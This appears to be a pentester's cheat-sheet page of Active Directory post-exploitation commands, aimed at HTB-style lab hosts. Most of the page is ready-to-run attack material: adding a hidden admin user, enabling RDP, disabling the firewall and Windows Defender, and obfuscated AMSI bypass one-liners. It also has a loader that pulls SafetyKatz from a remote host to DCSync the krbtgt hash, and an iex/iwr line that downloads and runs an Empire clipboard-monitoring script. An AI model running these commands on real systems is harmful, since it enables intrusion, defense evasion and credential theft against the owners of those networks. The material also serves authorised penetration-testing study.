Post Exploitation Active Directory Post Exploitation Checklists
RDP Stuff
Add Local Administrator
Create user asuka and add to RDP, Admin, and WinRM.
Copy net user asuka 'TrYh@rdeR!' /add
net localgroup "Remote Desktop Users" asuka /add
net localgroup "Administrators" asuka /add
net localgroup "Remote Management Users" asuka /add Enable RDP Access
Copy Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -
name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
# In case powershell is not enabled (like in old machine)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes Access RDP
Copy xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/
rdesktop support.htb
# fix ERRCONNECT_TLS_CONNECT_FAILED
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/ /tls-seclevel:0 Defender and Firewall Stuff
Turn Off Firewall
Copy # powershell
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
# cmd
netsh advfirewall set allprofiles state off Disable Defender Real Time Monitoring
Copy # Remove Defender Database
cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Get-MpComputerStatus
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -ExclusionExtension "ps1"
Set-MPPreference -DisableBehaviorMonitoring $true
# Disable AMSI (set to 0 to enable)
Set-MpPreference -DisableScriptScanning 1
# Check all exclusion folder
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath
# Add folder exclusion (in case tamper protection is enabled)
Add-MpPreference -ExclusionPath C:\Mimikatz\
# Disable Real Time Protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f Bypassing PowerShell Security
Using InviShell - https://github.com/OmerYa/Invisi-Shell
Copy C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat AMSI Bypass
Copy $a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)
Copy S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Copy [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) OPSEC with Loader
Copy C:\AD\Tools\Loader.exe -path http://172.16.100.67/SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit" Get-ClipboardContents
Monitors the clipboard on a specified interval for changes to copied text.
Copy iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents WADComs
WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.
Dump Saved Password
TCP Port Scanner
Copy 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.8.1",$_)) "Port $_ is open!"} 2>$null # powershell Ping Sweep
Copy for /l %i in (1,1,254) do @ping -n 1 -w 100 172.16.8.%i > nul && echo 172.16.8.%i is up. # cmd Inveigh
Responder, but in Powershell/C#
MDE Enum
How to extract Windows Defender Exclusions and Attack Surface Reduction (ASR) rules without Admin privileges
Copy # local
mde-enum.exe /local /paths /access
# remote
mde-enum.exe <ip> <username> <password> <domain> /paths
# i.e
.\mde-enum.exe 172.16.8.148 asuka Asuka@1337 child.zerobyte.lab /paths Or, use this Powershell script.
Copy $logName = "Microsoft-Windows-Windows Defender/Operational"
$eventID = 5007
$events = Get-WinEvent -LogName $logName | Where-Object { $_.Id -eq $eventID }
$exclusionEvents = $events | Where-Object { $_.Message -match "Exclusions" }
$pattern = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\[^\s]+"
$exclusionEvents | ForEach-Object {
if ($_.Message -match $pattern) {
$matches[0]
}
} Reference:
Other Useful Stuff
Last updated 9 months ago
